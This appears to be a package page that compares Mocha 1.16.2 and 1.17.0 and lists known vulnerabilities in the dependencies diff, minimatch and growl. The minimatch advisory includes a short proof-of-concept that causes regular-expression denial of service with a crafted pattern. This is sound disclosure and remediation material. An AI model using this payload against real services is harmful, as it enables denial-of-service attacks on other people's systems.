Mocha, a simple, flexible, and fun test framework for JavaScript, saw a release of version 1.17.0 following version 1.16.2. Both versions share a consistent core, evidenced by identical dependencies: diff, glob, jade, debug, growl, mkdirp, and commander. Similarly, their development dependencies, should and coffee-script, remain unchanged, suggesting a focus on maintaining existing testing practices. The repository and author information remain the same, indicating continuity in project ownership and management.
The primary difference lies in the release date. Version 1.17.0 was released on January 9, 2014, while version 1.16.2 came out on December 23, 2013. This roughly two-week gap signifies that the updated version includes bug fixes, minor enhancements, or potentially adjustments to internal mechanisms. Developers considering an upgrade should examine the changelog (available via the repository) for specifics on addressed issues and new features.
While both versions offer a robust testing environment, choosing 1.17.0 provides the advantage of benefiting from the latest refinements. For those starting a new project, the newer version provides a stable and time-tested test running environment. For existing projects using 1.16.2, an upgrade could resolve unforeseen issues, but a review of breaking changes is important before upgrading to avoid impacting the testing configuration.
All the vulnerabilities related to the version 1.17.0 of the package
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
Regular Expression Denial of Service in minimatch
Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).
var minimatch = require(“minimatch”);
// utility function for generating long strings
var genstr = function (len, chr) {
var result = “”;
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
var exploit = “[!” + genstr(1000000, “\\”) + “A”;
// minimatch exploit.
console.log(“starting minimatch”);
minimatch(“foo”, exploit);
console.log(“finishing minimatch”);
Update to version 3.0.2 or later.
minimatch ReDoS vulnerability
A vulnerability was found in the minimatch package. This flaw allows a Regular Expression Denial of Service (ReDoS) when calling the braceExpand function with specific arguments, resulting in a Denial of Service.
Growl before 1.10.0 vulnerable to Command Injection
Affected versions of growl do not properly sanitize input prior to passing it into a shell command, allowing for arbitrary command execution.
Update to version 1.10.0 or later.